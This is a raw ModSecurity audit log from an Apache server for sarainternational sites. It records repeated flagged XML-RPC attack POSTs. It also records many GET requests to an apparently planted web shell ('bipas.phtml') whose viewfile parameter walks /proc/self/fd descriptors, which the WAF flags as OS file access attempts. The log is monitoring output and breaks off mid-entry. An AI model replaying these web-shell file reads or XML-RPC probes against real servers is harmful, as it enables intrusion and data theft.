-) Stopwatch2: 1750120681552791 5027; combined=2871, p1=441, p2=2305, p3=38, p4=34, p5=53, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6f96f206-Z-- --bf560e04-A-- [17/Jun/2025:06:08:51.157339 +0530] aFC5GooVQnPDyHnl9oPd0wAAAAY 146.190.105.35 39574 127.0.0.1 7081 --bf560e04-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 495 Cookie: PHPSESSID=5q465tivrnne2h0rd77ru4fchq; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_16e5063c885582b2aa398133bf9d6b%7C%7C1750293529%7C%7C1750289929%7C%7Cd97c7920f7791af92d49944bbc8d1d2c; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=df2a82bd14e722b79ebb21a60d0376fa%7C%7C1750293529%7C%7C1750289929%7C%7C39a533da876e893c3532810b759d3209 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --bf560e04-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=kdvcrt9vdtt0sclocaal21v48h; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_6f0fd660699d9a19ef6d3e20ad27e2%7C%7C1750293530%7C%7C1750289930%7C%7C428858a0d3606cff02790a2214eebe11; expires=Thu, 19 Jun 2025 00:38:50 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=e39176c18a3ae93c905c59a80cea96f4%7C%7C1750293531%7C%7C1750289931%7C%7Ca3bb3f531c40fb98aef0962f363a6961; expires=Thu, 19 Jun 2025 00:38:51 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --bf560e04-E-- --bf560e04-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC5GooVQnPDyHnl9oPd0wAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750120730078718 1078712 (- - -) Stopwatch2: 1750120730078718 1078712; combined=3447, p1=535, p2=2517, p3=89, p4=39, p5=166, sr=103, sw=101, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bf560e04-Z-- --6e645f3a-A-- [17/Jun/2025:06:08:53.633709 +0530] aFC5HX4j6VFpohzeqUMWKgAAAAo 216.73.216.240 40110 127.0.0.1 7081 --6e645f3a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F9 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --6e645f3a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2987 Connection: close Content-Type: text/html; charset=UTF-8 --6e645f3a-H-- Message: Warning. Matched phrase "proc/self/fd/9" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/9 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/9" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/9 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5HX4j6VFpohzeqUMWKgAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120733629254 4511 (- - -) Stopwatch2: 1750120733629254 4511; combined=2370, p1=384, p2=1851, p3=38, p4=37, p5=60, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6e645f3a-Z-- --4faa2e03-A-- [17/Jun/2025:06:08:59.182474 +0530] aFC5IwBFs81uFEfQOXadyAAAAAM 216.73.216.240 40852 127.0.0.1 7081 --4faa2e03-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F99 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --4faa2e03-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --4faa2e03-H-- Message: Warning. Matched phrase "proc/self/fd/9" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/9 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/99"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/9" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/9 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/99"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5IwBFs81uFEfQOXadyAAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120739178112 4416 (- - -) Stopwatch2: 1750120739178112 4416; combined=2326, p1=347, p2=1845, p3=39, p4=34, p5=61, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4faa2e03-Z-- --54e19409-A-- [17/Jun/2025:06:09:05.923363 +0530] aFC5KYoVQnPDyHnl9oPd5gAAAAY 216.73.216.240 46784 127.0.0.1 7081 --54e19409-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F10 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --54e19409-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2988 Connection: close Content-Type: text/html; charset=UTF-8 --54e19409-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/10"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/10"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5KYoVQnPDyHnl9oPd5gAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120745918898 4520 (- - -) Stopwatch2: 1750120745918898 4520; combined=2380, p1=431, p2=1811, p3=39, p4=37, p5=62, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --54e19409-Z-- --b80a873e-A-- [17/Jun/2025:06:09:07.106356 +0530] aFC5K-3Ib0Hp5z3ImsFoCgAAAAc 216.73.216.240 46894 127.0.0.1 7081 --b80a873e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F178 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --b80a873e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --b80a873e-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/178"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/178"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5K-3Ib0Hp5z3ImsFoCgAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120747101041 5385 (- - -) Stopwatch2: 1750120747101041 5385; combined=2948, p1=431, p2=2344, p3=49, p4=48, p5=76, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b80a873e-Z-- --7619d807-A-- [17/Jun/2025:06:09:49.646642 +0530] aFC5Ve3Ib0Hp5z3ImsFoIgAAAAc 216.73.216.240 58148 127.0.0.1 7081 --7619d807-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F181 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --7619d807-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --7619d807-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/181"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/181"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5Ve3Ib0Hp5z3ImsFoIgAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120789642137 4560 (- - -) Stopwatch2: 1750120789642137 4560; combined=2507, p1=427, p2=1950, p3=38, p4=34, p5=58, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7619d807-Z-- --c9a6103b-A-- [17/Jun/2025:06:09:50.372884 +0530] aFC5Vn4j6VFpohzeqUMWVQAAAAo 216.73.216.240 58282 127.0.0.1 7081 --c9a6103b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F100 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --c9a6103b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --c9a6103b-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/100"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/100"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5Vn4j6VFpohzeqUMWVQAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120790290106 82843 (- - -) Stopwatch2: 1750120790290106 82843; combined=158870, p1=423, p2=1926, p3=40, p4=36, p5=78253, sr=128, sw=0, l=0, gc=78192 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c9a6103b-Z-- --4beba120-A-- [17/Jun/2025:06:09:50.566817 +0530] aFC5VtyZ4SMykfn97vzBygAAAAs 216.73.216.240 58344 127.0.0.1 7081 --4beba120-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F114 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --4beba120-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --4beba120-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/114"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/114"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5VtyZ4SMykfn97vzBygAAAAs"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120790562622 4249 (- - -) Stopwatch2: 1750120790562622 4249; combined=2193, p1=380, p2=1683, p3=35, p4=35, p5=60, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4beba120-Z-- --27d52f65-A-- [17/Jun/2025:06:09:51.527485 +0530] aFC5VlCTF37l_jAzt4odOQAAAAU 146.190.105.35 58326 127.0.0.1 7081 --27d52f65-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 493 Cookie: PHPSESSID=idqlvslppp34gspubte5bclgn5; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_52b1a8930d706b07ca2084b576e209%7C%7C1750293590%7C%7C1750289990%7C%7Ccf02468f83d82f4088be1ba0e9f40212; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=a1ba70e3cea224dbee4e3052327c6c2d%7C%7C1750293590%7C%7C1750289990%7C%7Caf48f665f081342e8cf24fb260c8d50c User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --27d52f65-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=03d3ecggejdk2qs1hekhnp9oht; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_a7fe18fd3b9507aa31919673eaea13%7C%7C1750293591%7C%7C1750289991%7C%7C2bf8d81f6473502526f0d10fc8d590b4; expires=Thu, 19 Jun 2025 00:39:51 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=ba540203b2166db43f6ac9cca0e1f095%7C%7C1750293591%7C%7C1750289991%7C%7C60ab20907e4ecbbae41945ee3dacff87; expires=Thu, 19 Jun 2025 00:39:51 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --27d52f65-E-- --27d52f65-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC5VlCTF37l_jAzt4odOQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750120790478939 1048624 (- - -) Stopwatch2: 1750120790478939 1048624; combined=4007, p1=494, p2=3084, p3=135, p4=41, p5=157, sr=134, sw=96, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --27d52f65-Z-- --b594e06a-A-- [17/Jun/2025:06:09:52.213346 +0530] aFC5WNyZ4SMykfn97vzBzQAAAAs 216.73.216.240 58532 127.0.0.1 7081 --b594e06a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F102 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --b594e06a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --b594e06a-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/102"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/102"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5WNyZ4SMykfn97vzBzQAAAAs"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120792209225 4185 (- - -) Stopwatch2: 1750120792209225 4185; combined=2133, p1=343, p2=1656, p3=37, p4=36, p5=61, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b594e06a-Z-- --2d4c3f4f-A-- [17/Jun/2025:06:09:52.396446 +0530] aFC5WH4j6VFpohzeqUMWWQAAAAo 216.73.216.240 58558 127.0.0.1 7081 --2d4c3f4f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F103 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --2d4c3f4f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --2d4c3f4f-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/103"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/103"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5WH4j6VFpohzeqUMWWQAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120792391851 4651 (- - -) Stopwatch2: 1750120792391851 4651; combined=2514, p1=450, p2=1926, p3=44, p4=37, p5=57, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2d4c3f4f-Z-- --9cce0562-A-- [17/Jun/2025:06:09:52.671729 +0530] aFC5WFCTF37l_jAzt4odOwAAAAU 216.73.216.240 58592 127.0.0.1 7081 --9cce0562-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F129 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9cce0562-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --9cce0562-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. 